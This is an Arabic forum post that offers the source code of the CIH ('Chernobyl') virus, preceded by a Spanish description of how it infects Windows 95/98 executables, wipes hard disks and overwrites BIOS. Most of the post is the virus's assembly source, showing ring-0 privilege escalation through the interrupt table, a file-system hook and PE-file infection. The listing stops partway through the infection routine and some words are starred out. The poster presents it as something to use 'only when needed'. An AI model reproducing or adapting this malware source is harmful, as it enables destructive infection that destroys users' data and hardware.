متيكو المدير والمشرف
المدير العام    الجنس :   عدد المساهمات : 590 تاريخ الميلاد : 02/11/1989 تاريخ التسجيل : 28/08/2009 العمر : 35 الموقع : www.matti-king.blogspot.com العمل/الترفيه : يشرف عالمنتدى ويدرس المزاج : تعبان  | موضوع: أكواد فايروس تشيرنوبل  الخميس مارس 10, 2011 1:13 am | |
| السلام عليكم ورحمة الله وبركاته
كاالعادة كما وعدتكم بموضوعاتي الجديدة والمفيدة والحصرية
اليوم أقدم لكم أكواد فايروس تشيرنوبل
ومع تمنياتي بعدم استخدام هذا الفيروس في إيذاء أي شخص عربي
ولكن الرجاء استخدامها فقط للحاجة فقط
الكود من هنا:
Este peligroso virus ha sido llamado por varios nombres, tales como "CIH", "NetworkNuke" y "Chernobyl".
El virus W32.CIH, se detectَ en Taiwلn a principios de Junio de 1998 y al cabo de una semana ya estaba expandido en todo el mundo, segْn la versiَn del mismo, puede ser activado el dيa 26 de Abril, o los dيas 26 de cada mes (o sea que se puede tener el virus sin consecuencias directas, mلs que el contagio, hasta esa fecha). El virus infecta los archivos ejecutables de 32 bits de Windows®95/98 e infectarل todos los archivos de este tipo que encuentre. Si se ejecuta un archivo infectado, el virus quedarل residente en la memoria e infectarل los archivos que sean copiados o abiertos.
Los archivos infectados serلn del mismo tamaٌo que los originales, debido a las técnicas especiales que utiliza dicho virus, lo cual hace mلs difيcil la detecciَn del mismo. Este virus busca espacios vacيos dentro del archivo y los va llenando con su propio cَdigo viral, en pequeٌos segmentos. De todas formas el virus tiene algunos bugs que hacen que pueden bloquear la PC cuando se ejecutan archivos infectados.
Todas las variantes de este virus borran los primeros 2048 sectores del disco duro, esencialmente, y luego formateلndolo, ademلs intenta re-escribir el BIOS de la computadora, dejلndola inutilizable hasta el cambio de BIOS o de placa madre. Este ْltimo tan solamente ocurre con placas madres que tienen un BIOS sobre-escribible (*****-Bios).
El virus tiene dos consecuencias en la fecha de activaciَn: La primera es que borra o sobre-escribe la informaciَn del disco duro usando llamadas de escritura directa, saltلndose las protecciones antivirus de BIOS, sobre-escribiendo asimismo el MBR (MASTER BOOT RECORD) y el sector del BOOT.
Estas son sus caracterيsticas bلsicas:
- El CIH estل programado para activarse el 26 de Abril (aniversario del accidente en Chernobyl).
- Algunas variantes de este virus se activarلn el 26 de Junio y la versiَn 1.4 lo harل el dia 26 de cualquier mes.
- Este virus infecta los archivos ejecutables de Windows®95/98 (archivos .EXE)
- Su cَdigo viral se integra como parte del archivo EXE ocupando un espacio no usado para de este modo evitar su detecciَn.
- Trabaja bajo la modalidad de "disparo", que le permite no evidenciarse hasta que se activa en la fecha indicada.
- El virus CIH destruye archivos en el disco duro y la memoria del BIOS en computadoras que cuentan con un ***** BIOS con capacidad de ser actualizable y que que se encuentre configurado como write-enabled.
Chen Ing-Hou, el creador del virus CIH, que lleva sus iniciales, manifiesta que siente mucho por lo desbastante de su creaciَn viral, pero ello fue motivado por una venganza en contra de los que llamَ "incompetentes desarrolladores de software antivirus".
"El no es un criminal aquي, mientras que no exista una denuncia formal", dijo un portavoz de la policيa y "todo lo que sabemos acerca del virus es por las noticias provenientes del extranjero.
Chen fue posteriormente acusado de ser sospechoso de haber esparcido en Internet un virus de computadora y de probلrsele los cargos podrيa enfrentar una pena de 3 aٌos de prisiَn, ademلs de daٌos y perjuicios reaclamados por posibles vيctimas.
Por esos motivos, Chen fue inmediatamente puesto en libertad.
Cuando Chen creَ el virus era un estudiante de Ingenierيa de Computaciَn en el Instituto Tecnolَgico de Taipé y después graduarse, estل cumpliendo el Servicio Militar Obligatorio en su paيs.
CODIGO FUENTE
------------------------------------------------------------
; ************************************************** **************************
; * The Virus Program Information *
; ************************************************** **************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 Now Version : 1.4 *
; * Modification Time : 05/31/1998 *
; * *
; * Turbo Assembler Version 4.0 : tasm /m cih *
; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe *
; * *
; *================================================= =========================*
; * Modification History *
; *================================================= =========================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *================================================= =========================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *================================================= =========================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *================================================= =========================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *================================================= =========================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ************************************************** **************************
.586P
; ************************************************** **************************
; * Original PE Executable File(Don't Modify this Section) *
; ************************************************** **************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; ************************************************** **************************
; * My Virus Game *
; ************************************************** **************************
; ************************************************** *******
; * Constant Define *
; ************************************************** *******
TRUE = 1
FALSE = 0
DEBUG = TRUE
MajorVirusVersion = 1
MinorVirusVersion = 4
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion
IF DEBUG
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 05h
ELSE
FirstKillHardDiskNumber = 80h
HookExceptionNumber = 03h
ENDIF
FileNameBufferSize = 7fh
; ************************************************** *******
; ************************************************** *******
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; ************************************************** *******
; * Ring3 Virus Game Initial Program *
; ************************************************** *******
MyVirusStart:
push ebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax, fs:[ebx]
call @0
@0:
pop ebx
lea ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; *************************************
; * Let's Modify *
; * IDT(Interrupt De******or Table) *
; * to Get Ring0 Privilege... *
; *************************************
push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
push esi
mov [ebx-04h], si ;
shr esi, 16 ; Modify Exception
mov [ebx+02h], si ; Entry Point Address
pop esi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
int HookExceptionNumber ; GenerateException
ReturnAddressOfEndException = $
; *************************************
; * Merge All Virus Code Section *
; *************************************
push esi
mov esi, eax
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmp LoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
pop esi
; *************************************
; * Generate Exception Again *
; *************************************
int HookExceptionNumber ; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xor ebx, ebx
jmp RestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp, [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; *************************************
; * Return Original App to Execute *
; *************************************
pop ebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack
ret ; Return to Original App Entry Point
; ************************************************** *******
; * Ring0 Virus Game Initial Program *
; ************************************************** *******
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
mov ecx, dr0
jecxz AllocateSystemMemoryPage
add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov [ebx-04h], bp ;
shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
mov dr0, ebx ; Set the Mark of My Virus Exist in System
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;
push ecx ;
push ecx ;
push 000000001h ;
push 000000002h ;
int 20h ; VMMCALL _PageAllocate
_PageAllocate = $ ;
dd 00010053h ; Use EAX, ECX, EDX, and flags
add esp, 08h*04h
xchg edi, eax ; EDI = SystemMemory Start Address
lea eax, MyVirusStart-@2[esi]
iretd ; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
lea eax, FileSystemApiHook-@6[edi]
push eax ;
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $ ;
dd 00400067h ; Use EAX, ECX, EDX, and flags
mov dr0, eax ; Save OldFileSystemApiHook Address
pop eax ; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx]
mov OldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
lea eax, InstallFileSystemApiHook-@3[eax]
mov [ecx], eax
cli
jmp ExitRing0Init
; ************************************************** *******
; * Code Size of Merge Virus Code Section *
; ************************************************** *******
CodeSizeOfMergeVirusCodeSection = offset $
; ************************************************** *******
; * IFSMgr_InstallFileSystemApiHook *
; ************************************************** *******
InstallFileSystemApiHook:
push ebx
call @4 ;
@4: ;
pop ebx ; mov ebx, offset FileSystemApiHook
add ebx, FileSystemApiHook-@4 ;
push ebx
int 20h ; VXDCALL IFSMgr_Re****FileSystemApiHook
IFSMgr_Re****FileSystemApiHook = $
dd 00400068h ; Use EAX, ECX, EDX, and flags
pop eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
push dword ptr [esp+8]
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
push eax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
push ebx
call OldInstallFileSystemApiHook-@3[ebx]
pop ecx
mov dr0, eax ; Adjust OldFileSystemApiHook Address
pop eax
pop ebx
ret
; ************************************************** *******
; * Static Data *
; ************************************************** *******
OldInstallFileSystemApiHook dd ?
; ************************************************** *******
; * IFSMgr_FileSystemHook *
; ************************************************** *******
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3 = FileSystemApiHook
pushad
call @5 ;
@5: ;
pop esi ; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy )
jnz pIFSFunc ; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
lea ebx, [esp+20h+04h+04h]
cmp dword ptr [ebx], 00000024h
jne prevhook
; *************************************
; * Enable OnBusy *
; *************************************
inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
; mov esi, offset FileNameBuffer
add esi, FileNameBuffer-@6
push esi
mov al, [ebx+04h]
cmp al, 0ffh
je CallUniToBCSPath
add al, 40h
mov ah, ':'
mov [esi], eax
inc esi
inc esi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push 00000000h
push FileNameBufferSize
mov ebx, [ebx+10h]
mov eax, [ebx+0ch]
add eax, 04h
push eax
push esi
int 20h ; VXDCall UniToBCSPath
UniToBCSPath = $
dd 00400041h
add esp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
; cmp [esi+eax-04h], '.EXE'
cmp [esi+eax-04h], 'EXE.'
pop esi
jne DisableOnBusy
IF DEBUG
; *************************************
; * Only for Debug *
; *************************************
; cmp [esi+eax-06h], 'FUCK'
cmp [esi+eax-06h], 'KCUF'
jne DisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmp word ptr [ebx+18h], 01h
jne DisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
mov ax, 4300h
int 20h ; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO = $
dd 00400032h
jc DisableOnBusy
push ecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
mov edi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
test cl, 01h
jz OpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
mov ax, 4301h
xor ecx, ecx
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xor eax, eax
mov ah, 0d5h
xor ecx, ecx
xor edx, edx
inc edx
mov ebx, edx
inc ebx
call edi ; VXDCall IFSMgr_Ring0_FileIO
xchg ebx, eax ; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
pop ecx
pushf
test cl, 01h
jz IsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
mov ax, 4301h
call edi ; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jc DisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
push esi ; Push FileNameBuffer Address to Stack
pushf ; Now CF = 0, Push Flag to Stack
add esi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetToNewHeader *
; ***************************
xor eax, eax
mov ah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
mov ebp, eax
push 00000004h
pop ecx
push 0000003ch
pop edx
call edi ; VXDCall IFSMgr_Ring0_FileIO
mov edx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
dec edx
mov eax, ebp
call edi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h
jne CloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle
push 00h ; Set VirusCodeSectionTableEndMark
* * *
__________________ | |
|
